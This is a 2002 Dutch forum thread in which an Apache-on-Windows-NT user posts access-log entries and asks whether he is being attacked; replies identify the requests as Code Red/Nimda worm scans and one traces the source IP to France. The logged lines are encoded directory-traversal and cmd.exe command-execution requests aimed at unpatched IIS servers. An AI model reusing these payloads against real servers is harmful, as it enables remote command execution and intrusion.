Ben ik nu wel of niet goed beveiligd?

Pagina: 1
Acties:
  • 55 views sinds 30-01-2008

  • WiNlUx
  • Registratie: April 2002
  • Laatst online: 12-09-2023
Ik heb dus apache draaien on winnt 40 server.
Nu las ik dit net in mn access.log van apache.

193.50.220.76 - - [04/Nov/2002:05:14:36 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
193.50.220.76 - - [04/Nov/2002:05:14:36 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
193.50.220.76 - - [04/Nov/2002:05:14:36 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
193.50.220.76 - - [04/Nov/2002:05:14:36 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
193.50.220.76 - - [04/Nov/2002:05:14:37 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
193.50.220.76 - - [04/Nov/2002:05:14:37 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
193.50.220.76 - - [04/Nov/2002:05:14:37 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
193.50.220.76 - - [04/Nov/2002:05:14:37 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
193.50.220.76 - - [04/Nov/2002:05:14:37 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
193.50.220.76 - - [04/Nov/2002:05:14:37 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
193.50.220.76 - - [04/Nov/2002:05:14:37 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
193.50.220.76 - - [04/Nov/2002:05:14:37 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
193.50.220.76 - - [04/Nov/2002:05:14:37 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
193.50.220.76 - - [04/Nov/2002:05:14:40 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
193.50.220.76 - - [04/Nov/2002:05:14:43 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
193.50.220.76 - - [04/Nov/2002:05:14:43 +0000] "GET /scripts/..%252f..

Is dit wel goed?? Of proberen ze mij te hacken? Zo te zien proberen ze scripts te gebruiken van apache :P

Verwijderd

Dit zijn CODE-red of NIMDA scans.
Een heeele oude worm die helaas nog steeds actief is.....

Verwijderd

tis in ieder geval een fransman

code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
  1    10 ms   <10 ms   <10 ms  192.168.1.10
  2    10 ms    10 ms    10 ms  ip103-65.introweb.nl [80.65.103.65]
  3    20 ms    10 ms    10 ms  ip107-209.introweb.nl [80.65.107.209]
  4    10 ms    20 ms     *     atm2-hgl-1.introweb.nl [80.65.96.1]
  5    10 ms    10 ms    20 ms  introweb1.rotterdam.wirehub.net [195.86.26.34]
  6    20 ms    20 ms    10 ms  br2.rotterdam.wirehub.net [195.86.112.75]
  7    20 ms    20 ms    20 ms  br0.enrot.nl.easynet.net [212.0.227.237]
  8    20 ms    10 ms    20 ms  fe0-2-1-0.gr0.enhfd.nl.easynet.net [207.162.205.
73]
  9    30 ms    40 ms    30 ms  so0-1-0-0.gr0.tclon.uk.easynet.net [207.162.205.
50]
 10    40 ms    20 ms    30 ms  so0-2-0-0.gr0.thlon.uk.easynet.net [207.162.205.
21]
 11    40 ms    30 ms     *     so0-2-0-0.gr0.bllon.uk.easynet.net [207.162.205.
13]
 12    40 ms    40 ms    41 ms  so0-1-1-0.gr0.bbpar.fr.easynet.net [207.162.205.
54]
 13    60 ms    60 ms    60 ms  ge0-2-0-0.br2.bbpar.fr.easynet.net [207.162.205.
70]
 14    40 ms    50 ms    50 ms  fe0-0.br1.bbpar.fr.easynet.net [195.114.91.164]

 15    60 ms    40 ms    51 ms  er0.ixavs.fr.easynet.net [195.114.91.54]
 16    40 ms    40 ms    40 ms  sfinx-labourse.sfinx.tm.fr [194.68.129.101]
 17    40 ms    40 ms    40 ms  nri-b.cssi.renater.fr [193.51.206.129]
 18    40 ms    40 ms    30 ms  jussieu-a1-1-580.cssi.renater.fr [193.51.179.154
]
 19    50 ms    40 ms    51 ms  rap-jussieu.cssi.renater.fr [193.51.12.78]
 20    50 ms    30 ms    40 ms  cr-jussieu.rap.prd.fr [195.221.126.77]
 21     *        *        *     Time-out bij opdracht.
 22     *        *     ^C

  • WiNlUx
  • Registratie: April 2002
  • Laatst online: 12-09-2023
Echt vaag. Maar heeft winroute deze voor mij geblokt?? Kan ik da ergens nalezen in de admin van Winroute?

  • Erkens
  • Registratie: December 2001
  • Niet online

Erkens

Fotograaf

WiNlUx schreef op 04 november 2002 @ 16:59:
Echt vaag. Maar heeft winroute deze voor mij geblokt?? Kan ik da ergens nalezen in de admin van Winroute?
dit is toch in je accesslog van apache?

maar hoe dan ook als je gewoon apache update enzo zit je wel veilig hoor ;)

  • RedHat
  • Registratie: Augustus 2000
  • Laatst online: 19-08 17:29
Hij schermt ze allemaal af met 404.... dus... ja... het is goed.

  • WiNlUx
  • Registratie: April 2002
  • Laatst online: 12-09-2023
mooi zo :) Ik heb nog nooit zoiets vaags gezien. Maar ik zal het wel vaker krijgen te zien. Maybe van een tweaker :P

  • Koffie
  • Registratie: Augustus 2000
  • Laatst online: 19-08 22:47

Koffie

Koffiebierbrouwer

Braaimeneer

OMG ... dit is toch wel heel erg oud hoor (dat code red/nimda).
En het eerste wat je doet als 100tallen van zulke meldingen in je errorlogs ziet, is deze ff in google danwel de search gieten.

Was je er meteen achter gekomen dat dit een virus is die op zoek is naar ongepatchede IIS servers.

Braaikamer - Smoke&BBQ

Pagina: 1

Dit topic is gesloten.